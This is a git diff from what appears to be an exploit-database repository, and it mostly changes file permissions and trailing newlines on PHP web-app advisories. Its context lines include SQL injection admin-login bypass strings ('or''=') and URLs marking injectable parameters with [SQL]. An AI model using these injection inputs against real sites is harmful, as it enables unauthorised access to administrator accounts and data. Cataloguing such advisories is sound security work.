d38f6deec..56232f051 --- a/platforms/php/webapps/41047.txt +++ b/platforms/php/webapps/41047.txt @@ -13,4 +13,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41048.txt b/platforms/php/webapps/41048.txt old mode 100755 new mode 100644 index fa5751fc9..90047d3f8 --- a/platforms/php/webapps/41048.txt +++ b/platforms/php/webapps/41048.txt @@ -19,4 +19,4 @@ # http://localhost/[PATH]/admin/user/manage # http://localhost/[PATH]/admin/user/userdetails/69 # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41049.txt b/platforms/php/webapps/41049.txt old mode 100755 new mode 100644 index 110739a6b..dd149373c --- a/platforms/php/webapps/41049.txt +++ b/platforms/php/webapps/41049.txt @@ -18,4 +18,4 @@ # http://localhost/[PATH]/admin/index.php?page=seasonallogo/manage # http://localhost/[PATH]/admin/index.php?page=seasonallogo/add # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4105.txt b/platforms/php/webapps/4105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41050.txt b/platforms/php/webapps/41050.txt old mode 100755 new mode 100644 index 3b8e9159e..c60bc3f15 --- a/platforms/php/webapps/41050.txt +++ b/platforms/php/webapps/41050.txt @@ -19,4 +19,4 @@ # http://localhost/[PATH]/admin/index.php?page=statistics/accountactivity # http://localhost/[PATH]/admin/index.php?page=calendar/calendar # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41051.txt b/platforms/php/webapps/41051.txt old mode 100755 new mode 100644 index ad33d4d37..cc452ec30 --- a/platforms/php/webapps/41051.txt +++ b/platforms/php/webapps/41051.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/admin/index.php?page=country/addcountry # http://localhost/[PATH]/admin/index.php?page=account/addbank # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41052.txt b/platforms/php/webapps/41052.txt old mode 100755 new mode 100644 index f167977d7..8b50b91d0 --- a/platforms/php/webapps/41052.txt +++ b/platforms/php/webapps/41052.txt @@ -14,4 +14,4 @@ # The following example URIs are available: # http://localhost/[PATH]/admin/user/search # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41053.txt b/platforms/php/webapps/41053.txt old mode 100755 new mode 100644 index 3817441e0..13ba42bf8 --- a/platforms/php/webapps/41053.txt +++ b/platforms/php/webapps/41053.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/admin/statistics/accountactivity # http://localhost/[PATH]/admin/statistics/js_showgraph # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41054.txt b/platforms/php/webapps/41054.txt old mode 100755 new mode 100644 index 3023e51f1..40465ba2e --- a/platforms/php/webapps/41054.txt +++ b/platforms/php/webapps/41054.txt @@ -15,4 +15,4 @@ # http://localhost/[PATH]/admin/index.php?page=account/statussettings # http://localhost/[PATH]/admin/index.php?page=account/newad # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41055.txt b/platforms/php/webapps/41055.txt old mode 100755 new mode 100644 index 5ac537348..87daeb0ec --- a/platforms/php/webapps/41055.txt +++ b/platforms/php/webapps/41055.txt @@ -15,4 +15,4 @@ # http://localhost/[PATH]/admin/settings/managersssettings # http://localhost/[PATH]/admin/settings/addrsssettings # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41056.txt b/platforms/php/webapps/41056.txt old mode 100755 new mode 100644 index 5afdf42ce..f37ebed54 --- a/platforms/php/webapps/41056.txt +++ b/platforms/php/webapps/41056.txt @@ -9,4 +9,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41058.txt b/platforms/php/webapps/41058.txt old mode 100755 new mode 100644 index f50e34d7d..db15275d2 --- a/platforms/php/webapps/41058.txt +++ b/platforms/php/webapps/41058.txt @@ -13,4 +13,4 @@ # http://localhost/[PATH]/best_pro_details.php?service_id=[SQL] # http://localhost/[PATH]/content.php?page=[SQL] # E.t.c.... Don't look for nothing there are also security vulnerabilities in other files as well. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41059.txt b/platforms/php/webapps/41059.txt old mode 100755 new mode 100644 index 156b9b96f..7682e857e --- a/platforms/php/webapps/41059.txt +++ b/platforms/php/webapps/41059.txt @@ -9,4 +9,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/admin/ and set Username and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4106.php b/platforms/php/webapps/4106.php old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41060.txt b/platforms/php/webapps/41060.txt old mode 100755 new mode 100644 index b15734d7c..403a68b3c --- a/platforms/php/webapps/41060.txt +++ b/platforms/php/webapps/41060.txt @@ -20,4 +20,4 @@ # http://localhost/[PATH]/MyCP/job-list.php # http://localhost/[PATH]/MyCP/job-pack.php # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41061.txt b/platforms/php/webapps/41061.txt old mode 100755 new mode 100644 index a4a3441fc..08bb586a3 --- a/platforms/php/webapps/41061.txt +++ b/platforms/php/webapps/41061.txt @@ -16,4 +16,4 @@ # http://localhost/[PATH]/admin/editdoc.php # http://localhost/[PATH]/admin/editdoc.php?doc_id=1 # Vs....... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41062.txt b/platforms/php/webapps/41062.txt old mode 100755 new mode 100644 index c76de60cd..c94d755dc --- a/platforms/php/webapps/41062.txt +++ b/platforms/php/webapps/41062.txt @@ -10,4 +10,4 @@ # Mail : ihsan[beygir]ihsan[nokta]net # # # # # # http://localhost/[PATH]/siteadmin/ and set Username:anything and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41063.txt b/platforms/php/webapps/41063.txt old mode 100755 new mode 100644 index 8056e37f6..bd186e6de --- a/platforms/php/webapps/41063.txt +++ b/platforms/php/webapps/41063.txt @@ -17,4 +17,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/adminlogin.php and set Mail:1@1.com and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41064.txt b/platforms/php/webapps/41064.txt old mode 100755 new mode 100644 index 283b6bca1..421467d55 --- a/platforms/php/webapps/41064.txt +++ b/platforms/php/webapps/41064.txt @@ -17,4 +17,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41065.txt b/platforms/php/webapps/41065.txt old mode 100755 new mode 100644 index 7c5a790fc..8f9da6f05 --- a/platforms/php/webapps/41065.txt +++ b/platforms/php/webapps/41065.txt @@ -15,4 +15,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Mail:1@1.com and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41066.txt b/platforms/php/webapps/41066.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41067.html b/platforms/php/webapps/41067.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41068.txt b/platforms/php/webapps/41068.txt old mode 100755 new mode 100644 index 151f69853..10a030870 --- a/platforms/php/webapps/41068.txt +++ b/platforms/php/webapps/41068.txt @@ -34,4 +34,4 @@ </body> </html> # # # # # -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4107.txt b/platforms/php/webapps/4107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41070.txt b/platforms/php/webapps/41070.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41071.txt b/platforms/php/webapps/41071.txt old mode 100755 new mode 100644 index 02adbaa44..40c2a223d --- a/platforms/php/webapps/41071.txt +++ b/platforms/php/webapps/41071.txt @@ -15,4 +15,4 @@ # # Admin Login Bypass # http://localhost/[PATH]/admin/ and set Usename:'or''=' and Password to 'or''=' and hit enter. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41075.txt b/platforms/php/webapps/41075.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4108.txt b/platforms/php/webapps/4108.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41080.txt b/platforms/php/webapps/41080.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41081.txt b/platforms/php/webapps/41081.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41083.txt b/platforms/php/webapps/41083.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41084.txt b/platforms/php/webapps/41084.txt old mode 100755 new mode 100644 index ad5c73e4c..123508378 --- a/platforms/php/webapps/41084.txt +++ b/platforms/php/webapps/41084.txt @@ -108,4 +108,4 @@ Permission is hereby granted for the redistribution of this advisory, provided t that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. All content (c) HYP3RLINX \ No newline at end of file +or exploits by the author or elsewhere. All content (c) HYP3RLINX \ No newline at end of file diff --git a/platforms/php/webapps/41087.txt b/platforms/php/webapps/41087.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41091.txt b/platforms/php/webapps/41091.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41092.txt b/platforms/php/webapps/41092.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41093.txt b/platforms/php/webapps/41093.txt old mode 100755 new mode 100644 index 5cdbbc23e..bdc2b2179 --- a/platforms/php/webapps/41093.txt +++ b/platforms/php/webapps/41093.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/news.dtl.php?id=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41094.txt b/platforms/php/webapps/41094.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41095.txt b/platforms/php/webapps/41095.txt old mode 100755 new mode 100644 index 3e333887d..2c87bbeb7 --- a/platforms/php/webapps/41095.txt +++ b/platforms/php/webapps/41095.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/user.profile.php?uid=[SQL] # E.t.c.... Other files, too. SQL There are security vulnerabilities. -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41096.txt b/platforms/php/webapps/41096.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41097.txt b/platforms/php/webapps/41097.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41098.txt b/platforms/php/webapps/41098.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41099.txt b/platforms/php/webapps/41099.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41100.txt b/platforms/php/webapps/41100.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41101.txt b/platforms/php/webapps/41101.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41102.txt b/platforms/php/webapps/41102.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41103.txt b/platforms/php/webapps/41103.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41104.txt b/platforms/php/webapps/41104.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41105.txt b/platforms/php/webapps/41105.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41106.txt b/platforms/php/webapps/41106.txt old mode 100755 new mode 100644 index 28015fef6..7ad6d9e70 --- a/platforms/php/webapps/41106.txt +++ b/platforms/php/webapps/41106.txt @@ -12,4 +12,4 @@ # http://localhost/[PATH]/question.php?id=[SQL] # http://localhost/[PATH]/category.php?id=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41107.txt b/platforms/php/webapps/41107.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41108.txt b/platforms/php/webapps/41108.txt old mode 100755 new mode 100644 index e19492a03..3a0f24c67 --- a/platforms/php/webapps/41108.txt +++ b/platforms/php/webapps/41108.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41109.txt b/platforms/php/webapps/41109.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4111.txt b/platforms/php/webapps/4111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41110.txt b/platforms/php/webapps/41110.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41111.txt b/platforms/php/webapps/41111.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41112.txt b/platforms/php/webapps/41112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41113.txt b/platforms/php/webapps/41113.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41114.txt b/platforms/php/webapps/41114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41116.txt b/platforms/php/webapps/41116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41119.txt b/platforms/php/webapps/41119.txt old mode 100755 new mode 100644 index aae9e287f..7648dbe80 --- a/platforms/php/webapps/41119.txt +++ b/platforms/php/webapps/41119.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/4112.txt b/platforms/php/webapps/4112.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41120.txt b/platforms/php/webapps/41120.txt old mode 100755 new mode 100644 index 249cd2146..6cd713367 --- a/platforms/php/webapps/41120.txt +++ b/platforms/php/webapps/41120.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41121.txt b/platforms/php/webapps/41121.txt old mode 100755 new mode 100644 index eecf7eadb..f297b79fc --- a/platforms/php/webapps/41121.txt +++ b/platforms/php/webapps/41121.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41122.txt b/platforms/php/webapps/41122.txt old mode 100755 new mode 100644 index f62a5c5ba..21f6441b3 --- a/platforms/php/webapps/41122.txt +++ b/platforms/php/webapps/41122.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41123.txt b/platforms/php/webapps/41123.txt old mode 100755 new mode 100644 index aef8ff3e1..39122caeb --- a/platforms/php/webapps/41123.txt +++ b/platforms/php/webapps/41123.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41124.txt b/platforms/php/webapps/41124.txt old mode 100755 new mode 100644 index 49f7aa1ba..45c488dc7 --- a/platforms/php/webapps/41124.txt +++ b/platforms/php/webapps/41124.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41125.txt b/platforms/php/webapps/41125.txt old mode 100755 new mode 100644 index 81fd68996..1f1838af7 --- a/platforms/php/webapps/41125.txt +++ b/platforms/php/webapps/41125.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41126.txt b/platforms/php/webapps/41126.txt old mode 100755 new mode 100644 index ef54c0b63..af3bc773e --- a/platforms/php/webapps/41126.txt +++ b/platforms/php/webapps/41126.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41127.txt b/platforms/php/webapps/41127.txt old mode 100755 new mode 100644 index 576b869ea..e7f7b05dc --- a/platforms/php/webapps/41127.txt +++ b/platforms/php/webapps/41127.txt @@ -11,4 +11,4 @@ # SQL Injection/Exploit : # http://localhost/[PATH]/search.php?term=[SQL] # E.t.c.... -# # # # # \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41131.txt b/platforms/php/webapps/41131.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41132.txt b/platforms/php/webapps/41132.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41133.txt b/platforms/php/webapps/41133.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41134.txt b/platforms/php/webapps/41134.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41135.txt b/platforms/php/webapps/41135.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41136.txt b/platforms/php/webapps/41136.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41137.txt b/platforms/php/webapps/41137.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41138.txt b/platforms/php/webapps/41138.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41139.txt b/platforms/php/webapps/41139.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4114.txt b/platforms/php/webapps/4114.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41140.txt b/platforms/php/webapps/41140.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4115.txt b/platforms/php/webapps/4115.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41150.txt b/platforms/php/webapps/41150.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41155.txt b/platforms/php/webapps/41155.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41159.txt b/platforms/php/webapps/41159.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4116.txt b/platforms/php/webapps/4116.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41166.txt b/platforms/php/webapps/41166.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41167.txt b/platforms/php/webapps/41167.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41168.txt b/platforms/php/webapps/41168.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41169.txt b/platforms/php/webapps/41169.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41172.txt b/platforms/php/webapps/41172.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41177.txt b/platforms/php/webapps/41177.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41178.txt b/platforms/php/webapps/41178.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41180.txt b/platforms/php/webapps/41180.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41181.txt b/platforms/php/webapps/41181.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41182.txt b/platforms/php/webapps/41182.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41184.txt b/platforms/php/webapps/41184.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41185.txt b/platforms/php/webapps/41185.txt old mode 100755 new mode 100644 index c25131659..a50634551 --- a/platforms/php/webapps/41185.txt +++ b/platforms/php/webapps/41185.txt @@ -137,4 +137,4 @@ Permission is hereby granted for the redistribution of this advisory, provided t that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information -or exploits by the author or elsewhere. \ No newline at end of file +or exploits by the author or elsewhere. \ No newline at end of file diff --git a/platforms/php/webapps/41186.txt b/platforms/php/webapps/41186.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41187.txt b/platforms/php/webapps/41187.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41188.txt b/platforms/php/webapps/41188.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41189.txt b/platforms/php/webapps/41189.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41190.txt b/platforms/php/webapps/41190.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41191.txt b/platforms/php/webapps/41191.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41193.txt b/platforms/php/webapps/41193.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41194.txt b/platforms/php/webapps/41194.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41195.txt b/platforms/php/webapps/41195.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41197.txt b/platforms/php/webapps/41197.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41198.txt b/platforms/php/webapps/41198.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41199.txt b/platforms/php/webapps/41199.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41201.txt b/platforms/php/webapps/41201.txt old mode 100755 new mode 100644 index 25b389553..4140ef5d4 --- a/platforms/php/webapps/41201.txt +++ b/platforms/php/webapps/41201.txt @@ -16,6 +16,4 @@ # http://localhost/[PATH]/message.php?pid=[SQL] # http://localhost/[PATH]/showSubcat.php?q=[SQL] # E.t.c -# # # # # - - \ No newline at end of file +# # # # # \ No newline at end of file diff --git a/platforms/php/webapps/41202.txt b/platforms/php/webapps/41202.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41203.txt b/platforms/php/webapps/41203.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41204.txt b/platforms/php/webapps/41204.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41209.txt b/platforms/php/webapps/41209.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41210.txt b/platforms/php/webapps/41210.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4122.txt b/platforms/php/webapps/4122.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41225.txt b/platforms/php/webapps/41225.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41226.txt b/platforms/php/webapps/41226.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41228.txt b/platforms/php/webapps/41228.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41229.txt b/platforms/php/webapps/41229.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41230.txt b/platforms/php/webapps/41230.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41231.txt b/platforms/php/webapps/41231.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41235.txt b/platforms/php/webapps/41235.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41238.txt b/platforms/php/webapps/41238.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41239.txt b/platforms/php/webapps/41239.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4124.txt b/platforms/php/webapps/4124.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41241.txt b/platforms/php/webapps/41241.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41242.txt b/platforms/php/webapps/41242.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41243.txt b/platforms/php/webapps/41243.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41244.txt b/platforms/php/webapps/41244.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41245.html b/platforms/php/webapps/41245.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41246.html b/platforms/php/webapps/41246.html old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41247.txt b/platforms/php/webapps/41247.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4125.txt b/platforms/php/webapps/4125.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41250.txt b/platforms/php/webapps/41250.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41251.txt b/platforms/php/webapps/41251.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41252.txt b/platforms/php/webapps/41252.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41253.txt b/platforms/php/webapps/41253.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41254.txt b/platforms/php/webapps/41254.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41255.txt b/platforms/php/webapps/41255.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41256.txt b/platforms/php/webapps/41256.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41258.txt b/platforms/php/webapps/41258.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41259.txt b/platforms/php/webapps/41259.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41260.txt b/platforms/php/webapps/41260.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41261.txt b/platforms/php/webapps/41261.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41262.txt b/platforms/php/webapps/41262.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41263.txt b/platforms/php/webapps/41263.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41264.txt b/platforms/php/webapps/41264.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41266.txt b/platforms/php/webapps/41266.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41267.txt b/platforms/php/webapps/41267.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41268.txt b/platforms/php/webapps/41268.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41269.txt b/platforms/php/webapps/41269.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4127.txt b/platforms/php/webapps/4127.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41270.txt b/platforms/php/webapps/41270.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41271.txt b/platforms/php/webapps/41271.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41272.txt b/platforms/php/webapps/41272.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41279.txt b/platforms/php/webapps/41279.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4128.txt b/platforms/php/webapps/4128.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41280.txt b/platforms/php/webapps/41280.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41283.txt b/platforms/php/webapps/41283.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41284.txt b/platforms/php/webapps/41284.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41285.txt b/platforms/php/webapps/41285.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41286.txt b/platforms/php/webapps/41286.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41287.txt b/platforms/php/webapps/41287.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41288.txt b/platforms/php/webapps/41288.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4129.txt b/platforms/php/webapps/4129.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41290.txt b/platforms/php/webapps/41290.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41291.txt b/platforms/php/webapps/41291.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41292.txt b/platforms/php/webapps/41292.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41293.txt b/platforms/php/webapps/41293.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41294.txt b/platforms/php/webapps/41294.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41295.txt b/platforms/php/webapps/41295.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41296.txt b/platforms/php/webapps/41296.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/4130.txt b/platforms/php/webapps/4130.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41300.txt b/platforms/php/webapps/41300.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41301.txt b/platforms/php/webapps/41301.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41302.txt b/platforms/php/webapps/41302.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41303.txt b/platforms/php/webapps/41303.txt old mode 100755 new mode 100644 diff --git a/platforms/php/webapps/41304.txt 